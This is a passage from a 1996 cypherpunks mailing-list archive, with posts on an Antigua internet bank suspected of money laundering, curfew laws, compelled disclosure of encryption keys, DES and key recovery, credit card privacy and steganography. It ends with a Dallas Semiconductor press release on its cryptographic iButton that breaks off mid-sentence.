                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      "We don't want to get our butts kicked by a bunch of long-haired 
        26-year-olds with earrings." -- General John Sheehan on their 
                       reasons for InfoWar involvement





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Oct 1996 02:58:47 +0800
To: cypherpunks@toad.com
Subject: EUB_low
Message-ID: <1.5.4.16.19961007141311.38278e72@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-7-96. WaPo:

   "Russian Crime Finds Havens In Caribbean"

      Russian organized crime groups are using unregulated and
      secretive Caribbean banks to launder their illicit
      gains, according to U.S. and Caribbean law enforcement
      officials. One bank that has drawn the scrutiny of U.S.
      authorities is European Union Bank in Antigua. EUB
      describes itself as the first bank on the Internet,
      offering the chance to open accounts, wire money, order
      credit cards or write checks by computer from anywhere
      in the world, 24 hours a day. A U.S. official said, "The
      bank is being investigated for violating U.S. laws with
      open solicitations on the Net, which is at best for tax
      evasion and at worst for money laundering."

   -----

   http://jya.com/eublow.txt  (10 kb)

   ftp://jya.com/pub/incoming/eublow.txt

   EUB_low







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 8 Oct 1996 07:58:52 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: Statism/Theocracy What's the difference--LDS
Message-ID: <9610071712.AA25796@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


So Snow,

Should your parents be (have been) allowed to pass
curfew laws along with the rest of the community
so that their wishes about you not going out could
be enforced?


   Ryan

---------- Previous Message ----------
To: attila
cc: cypherpunks
From: snow @ smoke.suba.com @ smtp
Date: 10/06/96 01:11:58 AM
Subject: Statism/Theocracy What's the difference--LDS

Attila said:
> In <v03007808ae7af10d0afb@[207.167.93.63]>, on 10/04/96 
>    at 09:03 AM, "Timothy C. May" <tcmay@got.net> said:
>         Frankly, we do not wish curfews, and there never were curfews 
>     before the immense immigration into the area, mostly from So. CA,

>         However, these people, Mormons (some good, some inactive) and

          (inactive=bad?)

>         well, that prompted the curfew, but they found it also 
>     maintained the semblance of peacful family oriented community
>     among the lost and alienated families --so it is apparently here
>     to stay.  other than the fact we are telling tparents who do not 
>     wish to manage their children they must keep them home or take them
>     somewhere, what does the law do? 

<snip>

> >.Telling people when they
> >.can be on public streets and when they cannot is no different than telling
> >.them what they can read and what they cannot.
>         that was my initial reaction -you wouldn't tell me that!  but 
>     consider the right of society to legislate and  regulate in the 
>     common good, despite both my and your abhorence of law in an of
>     itself.  
     
GAK is for the "common good", after all, it is only the people who are
doing wrong that will be hurt by having their data scanned by the Government,
it is just maintaining decency standards.  
> 
>         it is an effective means of forcing parents who do not seem to 
>     care, or parents who wish to shift their responsibilities to social
>     workers who are not available, they have a responsibility.  what
>     happens to the violators --few are arrested, they are asked to go
>     home. there is no great wild-west roundup of teenaged cattle! any
>     who resist or commit minor vandalism are taken to the center --but,

     For most of my life I have had insomnia, and when I was in my early
to mid teens, I used to wait until my parents had gone to sleep, and 
go out and wander the neighborhood, Mostly alone, sometimes until 2 or
3 in the morning (during the summer, not when I had to be at school).

     Why _shouldn't_ I be allowed to do this? In my case, it was against 
my parents wishes, but I still harmed nothing, commited no crime (there 
was no curfew where I lived). My father almost caught me (he knew I did it
from time to time, but figured as long as I wasn't causing trouble, he 
wouldn't be able to stop me). Just because other children cause trouble, why
should _mine_ be restricted? Just because it gives the APPERANCE OF MORALITY?

     I'll say that again, THE APREARANCE OF MORALITY. Forcing someone to 
follow a given set of rules doesn't make that person moral, it makes them 
a slave. Morality only comes in when there is choice. 

     Also, the waters are calm on the surface, but what about underneath? 
What is going on behind closed doors? Here in the outerworld, we have 
fornication on the streets, but we know who is doing it, we _know_ who the 
problems are. Do you?   

>         unlike every other city I have seen, they do not mix the 
>     'miscreants' with the juvenile delinquents, repeat offenders, and 
>     the teenagers who are obviously on their way to the dead end.

     Almost all teenagers are on their way to a dead end. It is called 
"Adulthood", which if you look at it a certain way looks a lot like 
A Dolt Hood. 

     I don't necessarily think it is a bad idea to mix kids (mid to late 
teens) picked up for "real" crimes in with "real"  criminals, but then
I don't think that staying out late should be a crime. 

     Fear can be a powerful motivator.  

>         what is the penalty?  call their parents for a ride home.  they
>     are not fingerprinted and mugged, etc.  very few are required to
>     even see a social worker.  consistent repeat offenders eventually
>     enter the system --as they should.

     Really, I should be in "the system" because I like wandering around at
night? 
  
     Real libertarian of you. 

> >.I still urge Attila to rethink his enthusiastic support of state-enforced
> >.curfews, or state-imposed bans on alcohol (not that I recall him supporting
> >.this particular law), etc.
>         actually, the curfew laws are local laws, and I reluctantly
>     decided to support curfew laws for minors after looking at the
>     means and results --it does provide an early point of intercepting
>     behavioral patterns with the *parent* being the judge and warder,
>     and hopefully give those parents a wakeup call they need to guide
>     their children as they are fast approaching adulthood where they
>     are fully accountable.

     Mr. May's usage of "state" means "governing body" rather than "state of
the union". But you knew that. There are many other "interception" points 
that can be utilized to identify children whose parents are not providing 
them with the state approved ideological underpinings, Let's take a look 
at some shall we? 

     Your children do well in school correct? Straight A's in most classes? 
it is obvious that you are driving your children too hard, teaching them tp
be overacheivers. You shouldn't push them so hard, they should stay at the 
level of their classmates. 

     Ok, that was hyperbole. Seriously tho', if you talk to many "social 
workers" <pardon me--*spit*> they can give you certain behavior patterns that
indicate a child is being abused in the home. They could (and I am sure some 
would like to) go so far as to include certain types of religious and political
indoctrination as abuse. 

     If the state (city/county) mandates it, and it gives the apperance of 
"stopping crime", or simply provides a smooth surface, is it worth it? 

         alcohol is available at any large grocery store; it has not been
>     banned to any extent since prohibition, but not necessarily avail-
>     able in rural areas.  

    Not in your area, and maybe not my LDS's, but try Pell City Alabama.
Same mentality, different name on the church house door. 

>         I do not think you can prohibit anything from adults --drugs,

     Can, or should? Let _me_ run the DEA, and give me a good budget, and 
I will stop it. Yeah, people will die, but they are dying anyway. 

>         certainly we are justified in ranting against any abridgement of 
>     our right to freely (and privately) communicate, freedom of 
>     *peaceful* assembly, a truly free press --certainly not the New 
>     World Order blinded press printing the official line dictated by
>     political/economic Boss Tweeds of what is effectively an oligarchy 
>     --they do not possess common principles sufficient to even be
>     called 'national socialists' (fascists). 

     Yet you argue for the abridgement of freedoms based on age. Does the 
state know better than a parent when a minor is old enough to be out after
midnight?

>         or, there is a government like Washington where they are trying
>     to, and may anyway, implement President Hillary's "It takes a 
>     Global Village" so the state can dictate everything and raise a new
>     generation of robots in the mold of their revisionist history which
>     we are now suffering by attrition....   

     Which really only pisses most people off because it is a different
revisionist history than they want taught. 

>         If Bubba and the President are reelected with a Democratic 
>     Congress, we will not recognize our once almost free country in

     Or, he will push too far, too fast, and it will snap back in his face.

     Remember, Klinton can't do it without congressional approval. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 8 Oct 1996 06:05:25 +0800
To: "Geoffrey C. Grabow" <cypherpunks@toad.com
Subject: Re: You can be forced to turn over your encryption keys?
In-Reply-To: <3.0b15.32.19961007103200.00683c1c@mail.pb.net>
Message-ID: <v0300780cae7ef8a2689f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM -0400 10/7/96, Geoffrey C. Grabow wrote:
>I thought we had a 5th amendment.  Isn't turning over your key that may (or
>may not) expose encriminating evidence an extension of self-encrimination?
>Haven't there been dozens of famous witnesses (Patty Hurst, Oliver North,
>etc) that "take the 5th" dozens of times on the stand.  Why couldn't I
>"take the 5th" when asked for my encryption keys?  When asked for your key,
>can't you say: "I'm sorry your honor, but I respectfully refuse to answer
>that question on the grounds that it may incriminate me.".
>
>Any legal-eagles out there?

Though IANAL, I know of many, many discussions of this question. So far as
I know, it remains one of The Great Unresolved Questions.

Mike Godwin has written on this, so a Web search might turn up some
archived articles. It came up several times on the Cyberia list when I was
on it, but those archives are spotty (in terms of availabilty to Web
spiders).

My Cyphernomicon FAQ also has this to say: (presented in outline form)

 10.3.4. "Can authorities force the disclosure of a key?"
           + Mike Godwin, legal counsel for the EFF, has been asked this
              queston _many_ times:
             - "Note that a court could cite you for contempt for not
                complying with a subpoena duces tecum (a subpoena
                requiring you to produce objects or documents) if you
                fail to turn over subpoenaed backups....To be honest, I
                don't think *any* security measure is adequate against a
                government that's determined to overreach its authority
                and its citizens' rights, but crypto comes close." [Mike
                Godwin, 1993-06-14]
           + Torture is out (in many countries, but not all). Truth
              serum, etc., ditto.
             - "Rubber hose cryptography"
           + Constitutional issues
             - self-incrimination
           + on the "Yes" side:
             + is same, some say,  as forcing combination to a safe
                containing information or stolen goods
               - but some say-and a court may have ruled on this-that
                  the safe can always be cut open and so the issue is
                  mostly moot
               - while forcing key disclosure is compelled testimony
             - and one can always claim to have forgotten the key
             - i.e., what happens when a suspect simply clams up?
             - but authorities can routinely demand cooperation in
                investigations, can seize records, etc.
           + on the "No" side:
             - can't force a suspect to talk, whether about where he hid
                the loot or where his kidnap victim is hidden
             - practically speaking, someone under indictment cannot be
                forced to reveal Swiss bank accounts....this would seem
                to be directly analogous to a cryptographic key
             - thus, the key to open an account would seem to be the
                same thing
             - a memorized key cannot be forced, says someone with EFF
                or CPSR
           + "Safe" analogy
             + You have a safe, you won' tell the combination
               - you just refuse
               - you claim to have forgotten it
               - you really don't know it
             - cops can cut the safe open, so compelling a combination
                is not needed
             - "interefering with an investigation"
           - on balance, it seems clear that the disclosure of
              cryptographic keys cannot be forced (though the practical
              penalty for nondisclosure could be severe)
           + Courts
             + compelled testimony is certainly common
               - if one is not charged, one cannot take the 5th (may be
                  some wrinkles here)
               - contempt
           + What won't immunize disclosure:
             + clever jokes about "I am guilty of money laundering"
               - can it be used?
               - does judge declaring immunity apply in this case?
               - Eric Hughes has pointed out that the form of the
                  statement is key: "My key is: "I am a murderer."" is
                  not a legal admission of anything.
             - (There may be some subtleties where the key does contain
                important evidence--perhaps the location of a buried body-
                -but I think these issues are relatively minor.)
           - but this has not really been tested, so far as I know
           - and many people say that such cooperation can be
              demanded...
           - Contempt, claims of forgetting
   10.3.5. Forgetting passwords, and testimony
           + This is another area of intense speculation:
             - "I forgot. So sue me."
             - "I forgot. It was just a temporary file I was working on,
                and I just can't remember the password I picked." (A less
                in-your-face approach.)
             + "I refuse to give my password on the grounds that it may
                tend to incriminate me."
               + Canonical example: "My password is: 'I sell illegal
                  drugs.'"
                 - Eric Hughes has pointed out this is not a real
                    admission of guilt, just a syntactic form, so it is
                    nonsense to claim that it is incriminating. I agree.
                    I don't know if any court tests have confirmed this.
           + Sandy Sandfort theorizes that this example might work, or
              at least lead to an interesting legal dilemma:
             - "As an example, your passphrase could be:

                        I shot a cop in the back and buried his body
                under
                        the porch at 123 Main St., anywhere USA.  The gun
                is
                        wrapped in an oily cloth in my mother's attic.

                "I decline to answer on the grounds that my passphrase is
                a statement which may tend to incriminate me.  I will
                only give my passphrase if I am given immunity from
                prosecution for the actions to which it alludes."

                "Too cute, I know, but who knows, it might work." [S.S.,
                1994-0727]


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 8 Oct 1996 05:36:00 +0800
To: cypherpunks@toad.com
Subject: Can somebody unsubscribe cyberpromo from CP?
Message-ID: <199610071724.KAA20735@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


I think somebody subscribed that Cyberpromo organization to the Cypherpunks 
list.  It needs to be unsubscribed...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Tue, 8 Oct 1996 06:47:50 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Can we kill single DES?
Message-ID: <199610071730.NAA19954@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:50 AM 10/6/96 -0700, Declan McCullagh <declan@eff.org> wrote:
>> >1. Is this a good idea? What will happen if DES becomes perceived
>> >    as insecure?
>> That's Declan's department (and other non-clueless journalists - [...]
>This is the meme I've been trying to spread -- that 56-bit DES is *not*
>secure. 

In particular, it's N>>20 years old, the NBS originally certified it for
five years, and kept recertifying it primarily because triple-DES was
too slow on the popular bank computers of the time (e.g. cash machines
and then PCs), and hardware implementations of 56-bit DES would need
to be replaced if the algorithm were decertified.  

Public-key encryption was developed a few years after DES,
with a solid mathematical background that lets it remain secure today.
It's far more secure than DES but far slower, so it's only been practical
the last few years.   Newer encryption technology which is several times 
faster and much stronger than DES has been developed over the last decade.

>This cuts through all the rhetoric about differences between key
>recovery and key escrow, who's going to be in this industry alliance, etc. 

"Key Recovery" is the latest sleazy meme from the Government.
The only difference from so-called "Key Escrow" is that it's deliberately
obscure about who gets to keep your master keys, while "Escrow" implies
that it's definitely somebody else besides you.

>From the "Eternal Vigilance is Better than Hindsight" department,
we should have seen this coming and done a pre-emptive strike on the term.
One of the papers on Dorothy Denning's web site is a May 20, 1996
SUBJECT: Draft Paper, "Enabling Privacy, Commerce, Security and Public
Safety in the Global Information Infrastructure" from OMB, which
is one of the Clipper 3 announcements, and it uses the term "key recovery".



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 8 Oct 1996 04:42:10 +0800
To: cypherpunks@toad.com
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <199610071307.JAA04143@nrk.com>
Message-ID: <7LNFVD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher <wb8foz@nrk.com> writes:

> [credit card]
>
> Any thought of privacy is a joke. Just because Punk's, Ltd.
> control the issuing bank, the clearinghouses in the middle
> will gleefully collect all the data and sell it.
>
> That would include the holders transactions, address, you name it.

Well, there are two issues:

When Alice buys her groceries and pays with a credit card, there are two
kinds of information involved:
1. What Alice bought;
2. Who Alice is.

#1 might include the fact that Alice bought some fat-free yoghurt.
#2 might include the fact that Alice lives at 123 Main St and makes
 $150K per annum.

If these two pieces of information are combined and sold to a direct marketing
company, then Alice might get some junk mail or telemarketing calls advising
her of other exciting diet opportunities.

American Express does the most extensive analysis of purchases paid for via
its cards, and gladly sells the results of its analysis to marketers. (Yep -
stuff like "the list of people who bought over $10 worth of health food w/
AmEx" is present and real, not a potential threat to privacy).

I *don't think* (but I could be wrong) that Visa and MasterCard's clearing
houses do this kind of purchase analysis now, but they certainly have the
ability. Some large banks that issue Visa and MasterCard cards do sell
marketing databases similar to AmEx's (based only on purchases made with their
cards), but each individual bank is smaller than AmEx.

Therefore, AFAIK, right now one is relatively safe from blanket analysis of
purchases by staying away from AmEx and from VISA/MC issued by certain large
banks. (Hint: a certain unnamed bank that arose from a merger recently has
been touting to marketers the fact that it's so big that its purchase analysis
database is as good as AmEx's.)

I suspect that if one contacts one's card issuer and requests in writing
that the information about your purchases not be distributed to third
parties w/o a court order, they'd probably comply. But it's only a matter
of time before the clearinghouses start doing the purchase analysis, as
David said.

As far as #2 is concerned, I can safely predict that if a financial institution
tried issuing credit cards or secured credit cards or debit cards without
asking the holder's SS# and identity (e.g., paid via anonymous e-cash),
they'd probably have audit visits from
a) the Federal Reserve
b) the office of the comptroller of the currency
c) the IRS (SS# is needed because the interest paid on the card may be
   deductible)
asking to prove that no money laundering or tax evasion is going on, and
shutting down the operations until the negative is proven.

Now, suppose you open an institution that a) puts a phoney name on the credit
card, b) takes down your real name, address, SS#, etc for its files, but
promises in writing not to reveal the identify or the purchasing patterns
to anyone except LEO's with a court order.

It might sell... I might even get one...

[An interesting twist: The Wiz, a very nice electronics store in NYC, only
accepts credit cards in combination with a photo ID. :-) ]

Such an outfit would last until the first big dispute. "Dispute" as in, someone
charges a purchase to the card and I claim I never made it. Or, I buy a gizmo,
decide to return it, and the merchant refuses to take it. With anonymity, the
disputant is likely to get screwed; or the issuer; never the merchant.

Another possibility is to issue a charge card (payable in full at the end of
the month, getting revenue from the annual fee), rather than a credit card, so
it could claim not to be subject to certain Federal Reserve's regulations that
have to do with credit card disputes. But then it probably can't be Visa/MC and
can't use their clearginhouses.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Tue, 8 Oct 1996 03:35:44 +0800
To: cypherpunks@toad.com
Subject: You can be forced to turn over your encryption keys?
Message-ID: <3.0b15.32.19961007103200.00683c1c@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


I thought we had a 5th amendment.  Isn't turning over your key that may (or
may not) expose encriminating evidence an extension of self-encrimination?
Haven't there been dozens of famous witnesses (Patty Hurst, Oliver North,
etc) that "take the 5th" dozens of times on the stand.  Why couldn't I
"take the 5th" when asked for my encryption keys?  When asked for your key,
can't you say: "I'm sorry your honor, but I respectfully refuse to answer
that question on the grounds that it may incriminate me.".

Any legal-eagles out there?

 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.       |
 | Oyster Bay, New York     |     Average people talk about things.     |
 | gcg@pb.net               |      Small people talk about people.      |
 |----------------------------------------------------------------------|
 |     PGP 2.6.2 public key available at http://www.pb.net/~wizard      |
 |          and on a plethora of key servers around the world.          |
 |                          Key ID = 0E818EC1                           |
 |   Fingerprint =  A6 7B 67 D7 E9 96 37 7D  E7 16 BD 5E F4 5A B2 E4    |
 |----------------------------------------------------------------------|
 | That which does not kill us, makes us stranger.   - Trevor Goodchild |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 8 Oct 1996 06:04:38 +0800
To: perry@piermont.com
Subject: Re: "European Union Bank"
In-Reply-To: <199610071550.LAA27746@jekyll.piermont.com>
Message-ID: <199610071736.KAA21570@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:
> 
> 
[stuff about EUB deleted]

 
> Be that as it may, but I wonder about the whole thing. EUBank's web
> server appears to be firmly ensconced in Washington, D.C. -- not
> exactly where one would expect their records to be kept, eh?


I noticed that too.  Is this BCCI 2, or just a front that the forces
of repression can use to say "look, there is money-laundering
on the Internet!  We must control it."


Their server appears to reside in McLean, VA., not Antigua:


ericm(console)> traceroute 204.157.123.4
traceroute to 204.157.123.4 (204.157.123.4), 30 hops max, 40 byte packets
[...]

12  * sl-capital-1-s1/0-T3.sprintlink.net (144.228.128.6)  148.345 ms *
13  cso-sw1p7-rC-p7.cais.net (205.252.5.30)  279.959 ms  147.905 ms *
14  * intr-c.sb1.cais.net (206.161.140.125)  163.211 ms  146.752 ms
15  204.157.123.4 (204.157.123.4)  204.088 ms * *


ericm(ttyp1)> whois cais.net
[rs.internic.net]
Capital Area Internet Service (CAIS2-DOM)
   6861 Elm Street, Third Floor
   McLean, VA 22101
   USA



ericm(ttyp1)> whois eub.com
[rs.internic.net]
European Union Bank (EUB-DOM)
   PO Box 1948
   St. John's, 
   Antigua and Barbuda

   Domain Name: EUB.COM

   Administrative Contact:
      Richards, Pete  (PR374)  75057.2515@COMPUSERVE.COM
      (809) 480-2370
   Technical Contact, Zone Contact, Billing Contact:
      Kulkov, Val  (VK41)  val@GREATIS.COM
      (202) 835-7489

   ELF.GREATIS.COM              205.229.28.5
   WHALE.GREATIS.COM            205.229.28.10

ericm(ttyp1)> whois VK41
[rs.internic.net]
Kulkov, Val (VK41)              val@GREATIS.COM
   Greatis USA, Inc.
   888 16th Street, NW, Suite 300
   Washington, DC 20006
   (202) 835-7489



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Tue, 8 Oct 1996 07:30:34 +0800
To: scottb@aca.ca
Subject: Re: picture encryption
Message-ID: <199610071755.NAA22300@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:04 PM 10/4/96 -0400, you wrote:
>Sometime back someone mentioned a program that would hide messages inside a 
>picture, by replacing the LSB of the color with the message.

There are several such programs.  The general term is "Steganography",
which means "hidden writing", so you'll see programs with names like
stego, jsteg, mandelsteg, etc.  Look in the usual archive locations
such as ftp.ox.ac.uk and ftp.funet.fi.  Also, for Romana Machado's
stego programs, look at her home page on www.fqa.com.

>I was thinking that if they outlawed high strength encryption (non GAK 
>approved), not letting them realize that you were sending encrypted 
>information would be an excellent alternative.  

It's not an _excellent_ alternative, but if it's all you can get,
it's all you can get.  It helps to use encryption algorithms that
don't have special forms, e.g. don't begin with "----- BEGIN PGP"
or other easy-to-spot headers, don't limit their output to printable ASCII,
and (tougher) don't have other subtleties such as the statistical
properties of RSA keys or checksums that can be tested without decrypting.
There's been a lot of discussion on the subject here, and there are
some stealth-PGP versions that obscure PGP's form.

One difficulty with stego'd encrypted data is that it's tough to use
it for applications like encrypting voice between your cellphone and
the cellphone company, since _they_ won't be implementing it.

One suggested place to stash encrypted data is in the low bits
of compressed voice on an internet phone product.  It's difficult -
you need to pick a voice compression algorithm that has room to
substitute bits without messing up the voice quality a lot,
which means you need to work closely with the compression algorithm.
For 64kbps PCM, this is easy (some of the T1 standards already do this
to send signalling bits, which is why data is often limited to 56kbps.)
ADPCM and Delta Modulation can probably handle it fairly well, though
they're generally used only down to speeds of 16 kbps.  Tighter compression
algorithms have less room for noise, are much more sophisticated,
require much more computation, and are probably a lot tougher to use,
but they're where most of the internet phone products are.

And then there are applications like CU-SeeMe (low-speed video conferencing)
which are generally flaky enough that you could toss in the occasional
stego frame and blame it on your cheapo camera or the overloaded reflector :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 8 Oct 1996 04:18:13 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: The Great Reducer: Line of the Year
In-Reply-To: <Pine.SUN.3.94.961006040618.13831B-100000@polaris>
Message-ID: <Pine.BSF.3.91.961007110150.4432N-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996, Black Unicorn wrote:

> 
> This is, without question, going in my alltime archive.
> 
> On Sat, 5 Oct 1996, jim bell wrote:
> 
> [...]
> 
> > You're ENTIRELY misunderstanding (or misrepresenting) what I'm saying!  I'm 
> > well aware that the SC disagrees, but that is simply because they are 
> > entirely wrong in this matter.


Well then, it is a good thing we have Mr. Bell here to set us all straight!

EBD

> 
> [...]
> 
> > 
> > Jim Bell
> > jimbell@pacifier.com
> > 
> 
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn@schloss.li
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 8 Oct 1996 03:47:19 +0800
To: cypherpunks@toad.com
Subject: Londinium
Message-ID: <3.0b19.32.19961007110200.00a064b8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


So a few days in Londinium for the Internet Show at the Aggie (now the
Business Design Centre) in the People's Republic of Islington.

While I was in town, Tony Blair's voicemail was hacked (it wasn't me) and
we discovered that he is a politician trying to fool the voters.

Also, a public domain game called "Schoolyard Slaughter" written for an
obsolete computer system and awarding points for head shots to children was
attacked in the press.  It was distributed on shareware disks and CDs and
not on the dreaded Net but they talked about the net in any case.

The interesting thing about "Schoolyard Slaughter" is that similar games
involving adult males and aliens ("Doom" par example) have been around for
a long time.  The lesser controversy surrounding games like Doom suggests
that the commentators (and perhaps the public) are guilty of speciesism,
ageism, and gender bias.  After all, the fictional slaughter of adult males
and aliens should be just as bad as the fictional slaughter of children. 

None of the ISPs represented at the Internet Show would comment on whether
or not they were going to ban customers who refused to rate their sites or
news posts.  But they were just sales types.  

I did teach a young lady working at the UUNET/Pipex booth how to telnet.
She'd never done so before.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 8 Oct 1996 03:51:22 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: EUB_low
Message-ID: <3.0b19.32.19961007110838.00a115a0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>      in the world, 24 hours a day. A U.S. official said, "The
>      bank is being investigated for violating U.S. laws with
>      open solicitations on the Net, which is at best for tax
>      evasion and at worst for money laundering."
>

I hate to tell the Feds but the internet is more of an international
publication than "High Life" (the BA inflight mag) or the BBC World Service
mag (whatever it's name is these days.

International publications can advertize offshore accounts and investments.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Oct 1996 04:52:43 +0800
To: cypherpunks@toad.com
Subject: Dallas Semiconductor turns on Internet commerce at the touch of abutton
Message-ID: <v03007809ae7ece78c86e@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain




Dallas Semiconductor turns on Internet commerce at the touch of
a button; wearable computer chip generates uncrackable codes using public
key cryptography
----------------------------------------------------------------------
    DALLAS--(BUSINESS WIRE)--Oct. 7, 1996--"Attention,
cyber-shoppers!  Your `electronic wallet' is almost ready."
    Internet users have been waiting for personal, trusted computing
to conduct commercial transactions -- mere pennies or big bucks.
Now it has been successfully demonstrated.
    Dallas Semiconductor (NYSE: DS) Monday announced development of
the Cryptographic iButton, a very personal computer in a 16mm,
stainless steel case that provides for the safe transfer of Internet
e-mail -- including credit card numbers -- even if the client
computer, software and communications links are not trustworthy.
The Crypto iButton is the result of a multi-year development at
Dallas Semiconductor to reach the pinnacle of computer security.
    "Think of it as a wearable, digital accessory," said Michael
Bolan, vice president of marketing for the 12-year-old manufacturer
that produces 120 million chips annually.  "You can attach it to
your wallet, keychain, jewelry (ring or bracelet), wrist watch, or
badge.  With the electronic wallet, the iButton communicates without
the user even having to open the wallet, providing convenience and
security.
    "This credential cannot be duplicated because it contains
information that is never revealed.  It positively authenticates a
person to a server computer or to another person using two-factor
security: personal possession of the iButton plus a PIN (Personal
Identification Number)," Bolan explained.
    iButton users will have universal access to their World Wide Web
e-mail at public Internet connections (hotels, airports, kiosks) and
still be confident that their mail is kept private.  Sensitive
information like credit card numbers can be transmitted safely by
secure e-mail using the Cryptographic iButton.  Mobile employees --
so-called "road warriors" -- can improve their productivity with
economical, secure access to corporate databases.

iButton Overcomes PC Vulnerability

    When software and PC hardware are hacked, information remains
safe in the physically secure iButton chip.  In one service model,
the iButton chip randomly generates a public and a private key set.
The private key is known only to the Cryptographic iButton; it is
never revealed, not even to its user.  The large key size of 1024
bits (308 decimal digits) makes guessing insurmountable.
    The iButton ensures both parties are truly authorized to
communicate by rendering messages into unbreakable digital codes
using its high-speed math accelerator.  The Crypto iButton addresses
both components of secure communications: authentication and safe
transmission.
    Physical attacks on the iButton by technologically savvy
criminals are thwarted.  The continuous steel perimeter triggers a
tamper response upon intrusion.  Critical security parameters,
including the private keys, are rapidly erased.
    Vulnerabilities of Smart Cards to certain physical attacks,
recently reported by computer scientists at Bellcore, were
anticipated during the design of the Cryptographic iButton.  Even if
the iButton is subjected to extraordinary physical stresses, it
does not leak out information that can be useful for inferring
secret data.
    Included on the monolithic chip is a True Time Clock, a
real-time clock with tamper evidence.  It provides a trusted time
stamp and audit trail for microcash metering or other off-line
transactions, as well as aiding in the detection of fraud by putting
time limits on service.  When the clock reaches a pre-set time, the
chip self-expires and requires reactivation before service can be
renewed.
    Unlike a loose plastic card, the iButton stays attached even
while communicating, making misplacement less likely.  Messages or
transactions are authorized only after the PIN is validated by the
iButton, the same technique automatic teller machines use to
dispense cash.

Microcash Stimulates I-Commerce

    "We don't expect to make money obsolete, although our small cash
version of the iButton is currently doing millions of transactions
as an electronic coin purse for mass transit riders in Istanbul,
Turkey and for patrons of Laniel vending machines in Canada," said
Bolan.
    "One strength of the Crypto iButton," he continued, "is its
ability to meter extremely small amounts economically in off-line
distributed systems.  A secure micro-payment system for electronic
property will ultimately enrich the content on the Internet by
giving producers a monetary incentive to distribute their work.
    "For example, reading the front page of a newspaper may tabulate
only 1 cent worth of microcash in a subscription meter while
downloading a Java software applet may tabulate a larger amount in a
